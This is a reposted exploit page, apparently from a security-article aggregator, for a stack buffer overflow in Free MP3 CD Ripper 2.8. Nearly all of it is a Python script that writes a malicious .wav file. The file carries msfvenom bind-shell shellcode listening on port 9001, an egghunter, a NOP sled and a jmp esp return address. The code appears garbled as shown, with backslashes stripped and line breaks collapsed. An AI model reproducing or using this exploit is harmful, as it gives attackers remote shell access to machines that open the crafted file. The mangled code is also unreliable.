HackDig : Dig high-quality web security articles for hackers

Free MP3 CD Ripper 2.8 Stack Buffer Overflow (SEH + Egghunter)

2020-08-06 05:19
# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)# Date: 2020-07-22# Exploit Author: Eduard Palisek# Vendor Homepage: https://www.cleanersoft.com# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe# Version: 2.8 Build 20140611# Tested on: [Windows XP, Professional, Version 2002, SP 3#!/usr/bin/pythonfile = open("exploit.wav", "wb")# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "x00x0ax0d" -f python -v shellcode_bindshellcode_bind =  b""shellcode_bind += b"xb8x88xbfxa2x65xdbxd6xd9x74x24"shellcode_bind += b"xf4x5ax2bxc9xb1x53x83xc2x04x31"shellcode_bind += b"x42x0ex03xcaxb1x40x90x36x25x06"shellcode_bind += b"x5bxc6xb6x67xd5x23x87xa7x81x20"shellcode_bind += b"xb8x17xc1x64x35xd3x87x9cxcex91"shellcode_bind += b"x0fx93x67x1fx76x9ax78x0cx4axbd"shellcode_bind += b"xfax4fx9fx1dxc2x9fxd2x5cx03xfd"shellcode_bind += b"x1fx0cxdcx89xb2xa0x69xc7x0ex4b"shellcode_bind += b"x21xc9x16xa8xf2xe8x37x7fx88xb2"shellcode_bind += b"x97x7ex5dxcfx91x98x82xeax68x13"shellcode_bind += b"x70x80x6axf5x48x69xc0x38x65x98"shellcode_bind += b"x18x7dx42x43x6fx77xb0xfex68x4c"shellcode_bind += b"xcax24xfcx56x6cxaexa6xb2x8cx63"shellcode_bind += b"x30x31x82xc8x36x1dx87xcfx9bx16"shellcode_bind += b"xb3x44x1axf8x35x1ex39xdcx1exc4"shellcode_bind += b"x20x45xfbxabx5dx95xa4x14xf8xde"shellcode_bind += b"x49x40x71xbdx05xa5xb8x3dxd6xa1"shellcode_bind += b"xcbx4exe4x6ex60xd8x44xe6xaex1f"shellcode_bind += b"xaaxddx17x8fx55xdex67x86x91x8a"shellcode_bind += b"x37xb0x30xb3xd3x40xbcx66x49x48"shellcode_bind += b"x1bxd9x6cxb5xdbx89x30x15xb4xc3"shellcode_bind += b"xbex4axa4xebx14xe3x4dx16x97x28"shellcode_bind += b"xa7x9fx71x44xa7xc9x2axf0x05x2e"shellcode_bind += b"xe3x67x75x04x5bx0fx3ex4ex5cx30"shellcode_bind += b"xbfx44xcaxa6x34x8bxcexd7x4ax86"shellcode_bind += b"x66x80xddx5cxe7xe3x7cx60x22x93"shellcode_bind += b"x1dxf3xa9x63x6bxe8x65x34x3cxde"shellcode_bind += b"x7fxd0xd0x79xd6xc6x28x1fx11x42"shellcode_bind += b"xf7xdcx9cx4bx7ax58xbbx5bx42x61"shellcode_bind += b"x87x0fx1ax34x51xf9xdcxeex13x53"shellcode_bind += b"xb7x5dxfax33x4exaex3dx45x4fxfb"shellcode_bind += b"xcbxa9xfex52x8axd6xcfx32x1axaf"shellcode_bind += b"x2dxa3xe5x7axf6xc3x07xaex03x6c"shellcode_bind += b"x9ex3bxaexf1x21x96xedx0fxa2x12"shellcode_bind += b"x8exebxbax57x8bxb0x7cx84xe1xa9"shellcode_bind += b"xe8xaax56xc9x38"egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x57x30x30x54x8bxfaxafx75xeaxafx75xe7xffxe7"nops  = "x90" * 30junk1 = "A" * 2112tag   = "W00TW00T"junk2 = "B" * (2000-len(shellcode_bind+nops+tag))eip   = "x53x93x42x7e"   # 0x7e429353 : jmp esp in user32.dllbuffer  = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunterfile.write(buffer)file.close()


Source: 2300800202-BLW/eussi/moc.ytirucesxc

Read:609 | Comments:0 | Tags:No Tag

“Free MP3 CD Ripper 2.8 Stack Buffer Overflow (SEH + Egghunter)”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools

Tag Cloud